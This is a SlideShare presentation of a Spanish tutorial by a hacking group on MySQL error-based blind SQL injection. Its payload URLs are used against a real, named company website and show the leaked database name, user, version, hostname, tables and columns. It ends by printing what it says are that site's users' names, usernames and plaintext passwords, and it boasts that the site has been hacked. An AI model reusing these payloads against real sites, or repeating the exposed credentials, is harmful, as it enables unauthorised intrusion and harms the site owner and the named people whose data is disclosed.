Error based blind sqli

2,888 views
2,793 views

Published on

MetalSoft #Team

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
2,888
On SlideShare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
22
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Error based blind sqli

  1. 1. MetalSoft #Team [Rs4 – xDarkSton3x – FailRoot – Root-M - Trouk¡Aviso!El articulo mostrado a continuación, es propiedad de MetalSoft #Team , todo lo expuesto aquífue redactado por los usuarios del Team . El usuario lector es responsable del “USO” que lede a la información expuesta en este mismo, MetalSoft #Team no se hace responsable.
  2. 2. MySQL (Error Based) Blind SQLiEn ocasiones nos encontramos con inyecciones en el que “ -1+unión+select+0” o el“order by” no te saca el numero de columnas y no puedes realizar la inyección, pues teaseguramos que lo primero que hacer es recurrir a una tool para que haga el trabajo.Esto nos ha ocurrido en varias inyecciones por lo que nos hemos decidimos investigarque otros métodos hay para este problema , con la búsqueda obtuvimos algunosresultados pero ahora faltaba ponerlos en práctica para ver si en realidad funcionaba.Para realizar la práctica utilizaremoshttp://www.audiser.com.ar/producto.php?id=1Buscando la Base de Datos:http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1Y como resultado dará: ERROR: --> 1062 - Duplicate entry ~audiser_audiser2011~1 for keygroup_keyObteniendo el Usuario Actual:http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for key group_keySacando la Versionhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1Resultado: ERROR: --> 1062 - Duplicate entry ~5.1.58-community~1 for key group_key
  3. 3. Base de Datos actualhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~audiser_audiser2011~1 for key group_keyUsuario Systemhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(system_user() as char),0x27,0x7e))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for key group_keyHostnamehttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(@@hostname as char),0x27,0x7e))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~capri.dattaweb.com~1 for key group_keyDirectorio de Instalaciónhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select concat(0x7e,0x27,cast(@@basedir as char),0x27,0x7e))from information_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~/~1 for key group_key
  4. 4. DB Userhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(GRANTEE aschar),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1resultado: ERROR: --> 1062 - Duplicate entry ~audiser_admin@localhost~1 for keygroup_keyEncontrar bases de datoshttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name aschar),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1N se incrementa.Resultado: ERROR: --> 1062 - Duplicate entry ~information_schema~1 for key group_keyNumero de tablas en la DB seleccionadahttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e)FROM `information_schema`.tables WHERE table_schema=0xDB _en_Hexa)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1http://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e)FROM `information_schema`.tables WHEREtable_schema=0x617564697365725f6175646973657232303131)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1Resultado: ERROR: --> 1062 - Duplicate entry ~13~1 for key group_key
  5. 5. Nombres de las tablas en la dbhttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name aschar),0x27,0x7e) FROM information_schema.tables Wheretable_schema=0x617564697365725f6175646973657232303131 limit 12,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1Resultado: ERROR: --> 1062 - Duplicate entry ~usuariosportal~1 for key group_keyNumero de columnas en la tablahttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECTconcat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columnsWHERE table_schema=0x617564697365725f6175646973657232303131 ANDtable_name=0x7573756172696f73706f7274616c)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Tabla y db en hexa.Resultado: ERROR: --> 1062 - Duplicate entry ~8~1 for key group_keyColumnas en la tablahttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name aschar),0x27,0x7e) FROM information_schema.columns Wheretable_schema=0x617564697365725f6175646973657232303131 ANDtable_name=0x7573756172696f73706f7274616c limit 6,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1el primer limit se incrementa de 1 en 1 para obtener las columnas.Resultado: ERROR: --> 1062 - Duplicate entry ~Password~1 for key group_key
  6. 6. Numero de datoshttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT concat(0x7e,0x27,count(*),0x27,0x7e) FROM`audiser_audiser2011`.usuarios)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1Resultado: ERROR: --> 1062 - Duplicate entry ~3~1 for key group_keyExtracción de datoshttp://www.audiser.com.ar/producto.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT concat(0x7e,0x27,cast(usuarios.user_pass aschar),0x27,0x7e) FROM `audiser_audiser2011`.usuarios LIMIT 2,1) ) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a) and 1=1Resultado: ERROR: --> 1062 - Duplicate entry ~1234~1 for key group_keyFinalmente podemos obtener los siguientes datos:DB: audiser_audiser2011Tabla: usuariosColumnas: user_id, user_nyap, user_pass , user_usuaDatos:user_id | user_nyap | user_pass | user_usua |5 | Audiser Argentina | 1234 | audiser11 |2 | Juan Carlos Lange | 123 | juanca |1 | Pablo Abadi | 2011 | pab_audi |Procedemos a la búsqueda del Panel Administrativo y HACKED ..! MetalSoft #Team

×